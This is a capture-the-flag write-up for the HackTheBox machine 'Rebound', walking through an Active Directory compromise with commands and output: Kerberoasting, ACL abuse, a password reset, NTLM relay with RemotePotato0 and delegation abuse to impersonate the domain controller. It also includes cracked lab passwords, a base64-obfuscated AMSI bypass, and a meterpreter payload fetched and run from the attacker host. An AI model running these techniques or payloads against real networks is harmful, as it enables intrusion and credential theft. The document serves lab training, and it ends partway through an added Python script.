# HTB - Rebound


## Description

Rebound is an Insane Windows machine featuring a tricky Active Directory environment. User enumeration via RID cycling reveals an AS-REP-roastable user, whose TGT is used to Kerberoast another user with a crackable password. Weak ACLs are abused to obtain access to a group with FullControl over an OU, performing a Descendant Object Takeover (DOT), followed by a ShadowCredentials attack on a user with winrm access. On the target system, cross-session relay is leveraged to obtain the NetNTLMv2 hash of a logged-in user, which, once cracked, leads to a gMSA password read. Finally, the gMSA account allows delegation, but without protocol transition. Resource-Based Constrained Delegation (RBCD) is used to impersonate the Domain Controller, enabling a DCSync attack, leading to fully elevated privileges.

## Enumeration

***

> IP Address: 10.10.11.231

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan

PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
5985/tcp open   wsman

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p53,88,135,139,389,445,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-31 20:41:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap    Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-31T20:43:17+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-time: 
|   date: 2024-10-31T20:41:42
|_  start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

**Summary**

```text
* Open ports: 53,88,135,139,389,445,5985
* UDP open ports: 53,88,123,389
* Services: DNS - RPC - SMB - KERBEROS - LDAP - NTP - winRM
* Important notes: DNS:dc01.rebound.htb - Domain: rebound.htb
```

Before I start, I'll update the `/etc/hosts` file to avoid issues later and to communicate with the box without typing the IP each time.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo sh -c "echo  '$ip dc01 dc01.rebound.htb rebound.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $tail -n1 /etc/hosts
10.10.11.231 dc01 dc01.rebound.htb rebound.htb
```

**Service Enumeration**

**DNS Enumeration**

It's always good to try a `Zone transfer`, but it hardly ever succeeds.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $dig axfr @10.10.11.231 dc01.rebound.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.10.11.231 dc01.rebound.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
```

**RPC & SMB Enumeration**

I didn't get anything interesting from RPC; SMB is next.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
result was NT_STATUS_ACCESS_DENIED
```

I can see that I have `Read` access on the `Shared` share, but unfortunately it's empty.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --shares

SMB     10.10.11.231    445    DC01   [+] rebound.htb\: 
SMB     10.10.11.231    445    DC01   [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares

SMB         10.10.11.231    445    DC01             [+] rebound.htb\guest: 
SMB         10.10.11.231    445    DC01             [*] Enumerated shares
SMB         10.10.11.231    445    DC01   Share    Permissions     Remark
SMB         10.10.11.231    445    DC01   -----    -----------     ------
SMB         10.10.11.231    445    DC01  ADMIN$                    Remote Admin
SMB         10.10.11.231    445    DC01  C$                        Default share
SMB         10.10.11.231    445    DC01  IPC$          READ        Remote IPC
SMB         10.10.11.231    445    DC01  NETLOGON                  Logon server share
SMB         10.10.11.231    445    DC01  Shared        READ      
SMB         10.10.11.231    445    DC01  SYSVOL                    Logon server share

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $impacket-smbclient rebound.htb/'guest':''@dc01
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use Shared
# ls
drw-rw-rw-          0  Fri Aug 25 17:46:36 2023 .
drw-rw-rw-          0  Fri Aug 25 17:46:36 2023 ..
```

RID brute-forcing failed with an anonymous login but succeeded with the `guest` account.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --rid-brute 10000

SMB         10.10.11.231    445    DC01             [+] rebound.htb\: 
SMB         10.10.11.231    445    DC01             [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --rid-brute 10000

SMB         10.10.11.231    445    DC01             [+] rebound.htb\guest: 
SMB         10.10.11.231    445    DC01             498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             500: rebound\Administrator (SidTypeUser)
SMB         10.10.11.231    445    DC01             501: rebound\Guest (SidTypeUser)
SMB         10.10.11.231    445    DC01             502: rebound\krbtgt (SidTypeUser)
SMB         10.10.11.231    445    DC01             512: rebound\Domain Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             513: rebound\Domain Users (SidTypeGroup)
SMB         10.10.11.231    445    DC01             514: rebound\Domain Guests (SidTypeGroup)
SMB         10.10.11.231    445    DC01             515: rebound\Domain Computers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             516: rebound\Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             517: rebound\Cert Publishers (SidTypeAlias)
SMB         10.10.11.231    445    DC01             518: rebound\Schema Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             519: rebound\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             520: rebound\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.231    445    DC01             521: rebound\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             522: rebound\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             525: rebound\Protected Users (SidTypeGroup)
SMB         10.10.11.231    445    DC01             526: rebound\Key Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             527: rebound\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             553: rebound\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.231    445    DC01             571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.231    445    DC01             572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.231    445    DC01             1000: rebound\DC01$ (SidTypeUser)
SMB         10.10.11.231    445    DC01             1101: rebound\DnsAdmins (SidTypeAlias)
SMB         10.10.11.231    445    DC01             1102: rebound\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.231    445    DC01             1951: rebound\ppaul (SidTypeUser)
SMB         10.10.11.231    445    DC01             2952: rebound\llune (SidTypeUser)
SMB         10.10.11.231    445    DC01             3382: rebound\fflock (SidTypeUser)
SMB         10.10.11.231    445    DC01             5277: rebound\jjones (SidTypeUser)
SMB         10.10.11.231    445    DC01             5569: rebound\mmalone (SidTypeUser)
SMB         10.10.11.231    445    DC01             5680: rebound\nnoon (SidTypeUser)
SMB         10.10.11.231    445    DC01             7681: rebound\ldap_monitor (SidTypeUser)
SMB         10.10.11.231    445    DC01             7682: rebound\oorend (SidTypeUser)
SMB         10.10.11.231    445    DC01             7683: rebound\ServiceMgmt (SidTypeGroup)
SMB         10.10.11.231    445    DC01             7684: rebound\winrm_svc (SidTypeUser)
SMB         10.10.11.231    445    DC01             7685: rebound\batch_runner (SidTypeUser)
SMB         10.10.11.231    445    DC01             7686: rebound\tbrady (SidTypeUser)
SMB         10.10.11.231    445    DC01             7687: rebound\delegator$ (SidTypeUser)
```

I added the users I found to a wordlist to use later.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $cat wordlists/users.list 

ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
ServiceMgmt
winrm_svc
batch_runner
tbrady
delegator$
```

**LDAP & Kerberos Enumeration**

I tried to query LDAP anonymously but got nothing from it.

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $ldapsearch -H ldap://10.10.11.231 -x -s sub '*' -b "DC=rebound,DC=htb"

# LDAPv3
# base <DC=rebound,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: * 
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563
```

The last option is Kerberos. With my username list, I can try two attacks: one common, and one that is new to many people.

1. `ASREP-Roasting Attack`
2. `Kerberoasting via an AS-REP-roastable account`

```bash
nxc ldap dc01 -u wordlists/users.list -p '' --asreproast asrep.hashes
```


Unfortunately, cracking the hash failed, which made me move on to the next possible attack.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

..snip..
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:812fbf1df8bffa65dd...2a6157
```

To perform this attack, we need the latest version of Impacket.

```bash
mkdir impacket && cd impacket
python3 -m venv . && source ./bin/activate
pip3 install impacket
```

The option we need is `-no-preauth` in `GetUserSPNs.py`, which lets us request service tickets using an account that does not require Kerberos pre-authentication (`jjones`).

## Foothold

***

I will try to request some hashes and, if that succeeds, write them to a file.

```bash
# Kerberoast every user in the list, using jjones (no pre-auth required) to get the TGT
python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebound.htb

# Same request, but save the hashes to a file for hashcat
python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebound.htb -output kerberos.hashes
```


```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 13100 kerberos.hashes /usr/share/wordlists/rockyou.txt

..snip..
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$8ebcdf0e97d1de0fd18f1bd980841c97$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:1GR8t@$$4u

Session..........: hashcat
Status...........: Cracked
```

Let's check whether these credentials are valid. Authentication to SMB worked, but LDAP failed.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u ldap_monitor -p '1GR8t@$$4u'

SMB    10.10.11.231    445    DC01   [+] rebound.htb\ldap_monitor:1GR8t@$$4u 

┌──[kali@parrot]─[~/HackTheBox/platform/machines/Rebound/ldapdomaindump]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u'

LDAPS       10.10.11.231    636    DC01   [-] rebound.htb\ldap_monitor:1GR8t@$$4u 
LDAPS       10.10.11.231    636    DC01   [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.
```

It looks like Kerberos authentication is enforced for LDAP, so I will try again with `-k`.

> I faced a Kerberos clock skew problem, and the common solutions didn't work, so I wrote this loop to sync with Kerberos each second. "Not the best way, but it worked :)" `while true; do ntpdate 10.10.11.231; sleep 1; done`

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u' -k

LDAPS   dc01     636    DC01    [+] rebound.htb\ldap_monitor 
```

With valid domain credentials, I can move on to the domain enumeration process: credentialed enumeration against LDAP and SMB, and a password spray. I will start with `bloodhound.py`.

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $bloodhound-python -u 'ldap_monitor@rebound.htb' -p '1GR8t@$$4u' -ns 10.10.11.231 -d rebound.htb --zip -k

INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: Done in 00M 42S
INFO: Compressing output into 20241031191948_bloodhound.zip
```

## Lateral Movement

***

Spraying the password showed that two users share it, and the third hit was a group, not a user.

I looked at the permissions on the shares and the files inside them with the `spider_plus` module, but found nothing interesting. I will enumerate the domain manually with `PowerView.py`.

```bash
(powerview.py) ┌─[kali@parrot]─[/opt/powerview.py]
└──╼ $python3 powerview.py rebound.htb/ldap_monitor:'1GR8t@$$4u'@10.10.11.231 -k

(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainUser -Identity oorend -Properties name,ObjectSid                                        
name          : oorend
objectSid     : S-1-5-21-4078382237-1492182817-2568127209-7682

(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682

[2024-10-31 19:46:49] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Self
AccessMask                  : 0x8
InheritanceType             : None
SecurityIdentifier          : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)
```

User `oorend` has `AddSelf` on the `ServiceMgmt` group, so I was curious to see this group's ACLs; I found that it has `FullControl` over the organizational unit (OU) `Service Users`.

```bash
(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7683
[2024-10-31 19:48:50] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : None
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : FullControl
AccessMask                  : 0xf01ff
InheritanceType             : None
SecurityIdentifier          : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)

(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -SearchBase "OU=Service Users,DC=rebound,DC=htb" -Select ObjectDN

..snip..
CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
..snip..
```
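As an added audit example (my code, not part of the original writeup), the two ACEs above plus the OU's children can be turned into a small graph and searched for a takeover chain, which is the same reasoning BloodHound applies, reduced to what this page shows. The ACE text is a constructed sample copied from the output above, and the containment map follows the `-SearchBase` query.

```python
import re
from collections import deque

# Constructed sample, modelled on the Get-DomainObjectAcl output above (not a live dump)
SAMPLE_ACES = """\
ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ActiveDirectoryRights       : Self
AccessMask                  : 0x8
InheritanceType             : None
SecurityIdentifier          : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ActiveDirectoryRights       : FullControl
AccessMask                  : 0xf01ff
InheritanceType             : None
SecurityIdentifier          : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)
"""

# Objects directly under the OU, from the -SearchBase query above
CONTAINMENT = {
    "OU=Service Users,DC=rebound,DC=htb": [
        "CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb",
        "CN=batch_runner,OU=Service Users,DC=rebound,DC=htb",
    ],
}

# Rights that let the holder take over the target object (Self on a group = AddSelf)
TAKEOVER_RIGHTS = {"FullControl", "GenericAll", "GenericWrite", "WriteDacl",
                   "WriteOwner", "WriteProperty", "ForceChangePassword", "Self"}

def rdn(dn):
    """'CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb' -> 'ServiceMgmt'"""
    return dn.split(",", 1)[0].split("=", 1)[1]

def parse_aces(text):
    """Split PowerView-style 'Key : Value' blocks into one dict per ACE."""
    aces = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            key, _, val = line.partition(":")
            rec[key.strip()] = val.strip()
        aces.append(rec)
    return aces

def build_edges(aces, containment):
    """Directed graph principal -> [(right, target)]. Control of an OU is treated as
    control of each child: that is what an inheritable ACE on the OU hands out (DOT)."""
    edges = {}
    for ace in aces:
        principal = ace["SecurityIdentifier"].split(" (")[0]
        rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
        abusable = rights & TAKEOVER_RIGHTS
        if not abusable:
            continue
        target_dn, label = ace["ObjectDN"], ",".join(sorted(abusable))
        edges.setdefault(principal, []).append((label, rdn(target_dn)))
        for child_dn in containment.get(target_dn, []):
            edges.setdefault(rdn(target_dn), []).append(("inherited " + label, rdn(child_dn)))
    return edges

def find_path(edges, start, goal):
    """Breadth-first search for a chain of abusable rights from start to goal."""
    queue, seen = deque([(start, [start])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for right, nxt in edges.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + ["-[%s]->" % right, nxt]))
    return None

def audit(text=SAMPLE_ACES, containment=CONTAINMENT, start="oorend", goal="winrm_svc"):
    return find_path(build_edges(parse_aces(text), containment), start, goal)
```

Run with real `Get-DomainObjectAcl` output and a containment map from an `OU` search, and `audit()` returns the chain (or `None`) for any start/goal pair.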

When enumerating the domain objects under this OU, I found that it contains the `winrm_svc` account, which is a member of `Remote Management Users` and can therefore access the machine via `winRM`.

The exploitation path is: `Abuse AddSelf` => `Abuse FullControl Inheritance` => `ChangePassword` of `winrm_svc` or `Shadow Credentials`

```bash
# As oorend (who shares ldap_monitor's password), add oorend to the ServiceMgmt group
python3 powerview.py rebound.htb/oorend:'1GR8t@$$4u'@10.10.11.231 -k
Add-DomainGroupMember -Identity "ServiceMgmt" -Members oorend
```

```bash
# Now a member of ServiceMgmt, grant oorend full control over the OU (inherited by its objects)
Add-DomainObjectAcl -TargetIdentity "OU=Service Users,DC=rebound,DC=htb" -PrincipalIdentity oorend -Rights fullcontrol
# or
./bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --dc-ip 10.10.11.231 -k --host dc01.rebound.htb add genericAll "OU=Service Users,DC=rebound,DC=htb" oorend
```


```bash
# With inherited control over winrm_svc, reset its password
Set-DomainUserPassword -Identity winrm_svc -AccountPassword 'NewPass@w0rd123!!'
# or
net rpc password winrm_svc 'NewPass@w0rd123!!' -U rebound.htb/oorend%'1GR8t@$$4u' -S 10.10.11.231
```


Access the machine

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $evil-winrm -i dc01 -u winrm_svc -p 'NewPass@w0rd123!!'

*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
```

> User Flag: 46bad1cb1f3b5f3da2945c6f38c92c7c

## Privilege Escalation

***

The password and ACLs are reset periodically, so I must hurry and establish a persistent shell.

```bash
# On the attacker box: generate the PowerShell payload and start the handler
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=443 -f psh -o shell.ps1
sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.3;set lport 443;set payload windows/x64/meterpreter/reverse_tcp; run'
```

Then, in the Evil-WinRM session on the target:

```powershell
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)

iex(iwr -UseBasicParsing 10.10.16.3/shell.ps1)
```

After getting a shell in `metasploit`, I tried to query logged-on users, but it gave me nothing. However, when filtering for `logon type 9`, it shows that the `tbrady` user is logged on.

Looking in BloodHound at that user's privileges, I found that it can read the `GMSA` account's password hash.

To get this account, I can use a `cross-session` attack to capture its `NTLMv2` hash, then try to crack it.

I used this repo to perform the attack: [antonioCoco/RemotePotato0: Windows Privilege Escalation from User to Domain Admin.](https://github.com/antonioCoco/RemotePotato0)


Following the repo's instructions, I ended up with these two commands.

```bash
# On the attacker box: forward port 135 to the listener on the target
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 &
# On the target, from the winrm_svc shell
.\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.3 -p 9999
```


Cracking the hash with `hashcat` succeeded :))

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 5600 hashes/ntlmv2.hash /usr/share/wordlists/rockyou.txt

TBRADY::rebound:0a5c6a4a69ec25ec:45e00b50ae6b1770ce5783b45df11a7b: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:543BOMBOMBUNmanda

Session..........: hashcat
Status...........: Cracked
```

Now I can read the `GMSA` account's hash.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u TBRADY -p '543BOMBOMBUNmanda' --gmsa -k

LDAPS       dc01            636    DC01             [+] rebound.htb\TBRADY:543BOMBOMBUNmanda 
LDAPS       dc01            636    DC01             [*] Getting GMSA Passwords
LDAPS       dc01            636    DC01             Account: delegator$  NTLM: ed8d95b20400dce3355419f277d3421c
```

I want to enumerate the delegation rights of the `delegator$` account.

```bash
(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $findDelegation.py rebound.htb/'delegator$'@dc01 -hashes :ed8d95b20400dce3355419f277d3421c -k                                                                                                                 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName  AccountType                          DelegationType  DelegationRightsTo     SPN Exists                                                                                                                
-----------  -----------------------------------  --------------  ---------------------  ----------                                                                                                                
delegator$   ms-DS-Group-Managed-Service-Account  Constrained     http/dc01.rebound.htb  No
```

This is where I got stuck for a while. The `constrained delegation` here is to the `http` service on DC01 only, and since `delegator$` is not trusted for protocol transition, I couldn't directly request a ticket impersonating the `administrator` or `DC01`. The attack path that follows is fairly involved, so I will simplify it as much as I can.

1. Since I already control the `delegator$` account, I can configure `RBCD` on it by adding `ldap_monitor` to its `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute, so `ldap_monitor` can obtain a service ticket to `delegator$` as any user in the domain.
2. Request a service ticket as `ldap_monitor` impersonating `DC01$`; because this ticket is issued through S4U2Proxy (RBCD) rather than S4U2Self, it will have the `forwardable` flag.
3. Use this ticket in place of the `s4u2self` ticket in `delegator$`'s constrained delegation request to `http/dc01.rebound.htb`, impersonating the DC.

```bash
# 1. As delegator$, add ldap_monitor to delegator$'s msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD)
rbcd.py 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps

# Verify that the RBCD entry is now present
findDelegation.py 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :ed8d95b20400dce3355419f277d3421c

# 2. As ldap_monitor, get a forwardable service ticket to delegator$'s SPN, impersonating DC01$
getST.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate 'DC01$'

# 3. As delegator$, feed that ticket to S4U2Proxy instead of an S4U2Self ticket,
#    to obtain a ticket for http/dc01.rebound.htb as DC01$
getST.py -spn http/dc01.rebound.htb -impersonate 'DC01$' 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -additional-ticket 'DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'

# Point the Kerberos tools below at the resulting ccache (impacket names it <user>@<spn>@<REALM>.ccache)
export KRB5CCNAME='DC01$@http_dc01.rebound.htb@REBOUND.HTB.ccache'
```
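Added example, not from the writeup: a defender-side check that classifies an account's delegation settings the way `findDelegation.py` does, including decoding the security descriptor that `rbcd.py` writes into `msDS-AllowedToActOnBehalfOfOtherIdentity`. The `DELEGATOR` record is a constructed sample of `delegator$` after step 1, `ldap_monitor`'s SID is the domain SID with RID 7681 from the RID brute above, and `build_rbcd_sd` is my helper for constructing the test descriptor.

```python
import struct

UF_TRUSTED_FOR_DELEGATION = 0x80000           # unconstrained delegation
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained + protocol transition

def sid_to_bytes(sid):
    """'S-1-5-21-...-7681' -> binary SID (revision, count, 6-byte authority, sub-auths)"""
    parts = sid.split("-")
    rev, auth, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return (bytes([rev, len(subs)]) + auth.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def bytes_to_sid(data, off):
    """Decode a binary SID at offset off; return (sid_string, next_offset)."""
    rev, count = data[off], data[off + 1]
    auth = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-%d-%d-%s" % (rev, auth, "-".join(map(str, subs))), off + 8 + 4 * count

def build_rbcd_sd(sids):
    """Constructed self-relative security descriptor with one ACCESS_ALLOWED ACE per
    SID, the shape rbcd.py -action write stores in the attribute (helper for testing)."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        # AceType 0 (ACCESS_ALLOWED), AceFlags 0, AceSize, Mask 0xf01ff (FullControl)
        aces += struct.pack("<BBHI", 0, 0, 8 + len(sid_b), 0xF01FF) + sid_b
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    # Revision 1, Control = SE_DACL_PRESENT | SE_SELF_RELATIVE, no owner/group/SACL, DACL at byte 20
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + dacl

def rbcd_sids(sd):
    """SIDs allowed to act on behalf of other identities to the account owning sd."""
    dacl_off = struct.unpack_from("<I", sd, 16)[0]
    if dacl_off == 0:
        return []
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0:  # ACCESS_ALLOWED_ACE: 4-byte header + 4-byte mask, then the SID
            sids.append(bytes_to_sid(sd, off + 8)[0])
        off += ace_size
    return sids

def classify(account):
    """Mirror findDelegation.py's DelegationType column from the raw LDAP attributes."""
    uac = account.get("userAccountControl", 0)
    findings = []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        findings.append("Unconstrained")
    spns = account.get("msDS-AllowedToDelegateTo", [])
    if spns:
        kind = ("Constrained w/ Protocol Transition"
                if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION else "Constrained")
        findings.append("%s -> %s" % (kind, ", ".join(spns)))
    sd = account.get("msDS-AllowedToActOnBehalfOfOtherIdentity")
    if sd:
        findings.append("Resource-Based Constrained from %s" % ", ".join(rbcd_sids(sd)))
    return findings

# Constructed sample of delegator$ after the rbcd.py write above. There is no TRUSTED_TO_AUTH
# bit, which is why a plain S4U2Self ticket from delegator$ is not forwardable.
LDAP_MONITOR_SID = "S-1-5-21-4078382237-1492182817-2568127209-7681"  # domain SID + RID 7681
DELEGATOR = {
    "sAMAccountName": "delegator$",
    "userAccountControl": 0x1000,  # WORKSTATION_TRUST_ACCOUNT only
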